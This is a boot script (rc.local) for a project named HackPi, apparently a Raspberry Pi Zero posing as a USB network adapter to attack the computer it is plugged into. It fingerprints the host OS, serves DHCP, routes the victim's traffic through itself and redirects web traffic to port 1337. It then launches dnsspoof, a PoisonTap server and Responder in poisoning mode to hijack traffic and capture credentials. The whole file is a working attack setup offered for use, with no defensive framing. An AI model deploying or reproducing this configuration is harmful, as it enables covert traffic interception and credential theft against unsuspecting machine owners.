#!/bin/sh -e

# rc.local

# This script is executed at the end of each multiuser runlevel.
# Make sure that the script will "exit 0" on success or any other
# value on error.
#
# In order to enable or disable this script just change the execution
# bits.
#
# By default this script does nothing.

source /boot/poison.txt

# Print the IP address
_IP=$(hostname -I) || true
if [ "$_IP" ]; then
  printf "My IP address is %s\n" "$_IP"
fi

# Parse USB requests in dmesg
/bin/bash /home/pi/HackPi/fingerprint.sh | tee /home/pi/os.txt

# Stop the dummy gadget and start the real one
modprobe -r g_ether
modprobe libcomposite

# libcomposite configuration
/bin/sh /home/pi/HackPi/gadget.sh | tee /home/pi/HackPi/gadget.log

# Start bridge interface
sleep 3
ifup br0 || true
ifconfig br0 up || true

# Clear leases
rm -f /var/lib/dhcp/dhcpd.leases
touch /var/lib/dhcp/dhcpd.leases

# Start the DHCP server
/sbin/route add -net 0.0.0.0/0 br0
/etc/init.d/isc-dhcp-server start
# Set some other paramaters
/sbin/sysctl -w net.ipv4.ip_forward=1
/sbin/iptables -t nat -A PREROUTING -i br0 -p tcp --dport 80 -j REDIRECT --to-port 1337

# Enable Serial
systemctl enable getty@ttyGS0.service

# Check /boot/poison.txt to see if poisontap is enabled

if [ $poison == "true" ]; then
    /usr/bin/screen -dmS dnsspoof /usr/sbin/dnsspoof -i br0 port 53
    /usr/bin/screen -dmS node /usr/bin/nodejs /home/pi/poisontap/pi_poisontap.js

    # Start Responder (uncomment for poisontap)
    /usr/bin/screen -dmS responder bash -c 'cd /home/pi/Responder/; python Responder.py -I br0 -f -w -r -d -F'

    # TODO: Sed replace poisontap source with websocket address
fi

# Exit
exit 0
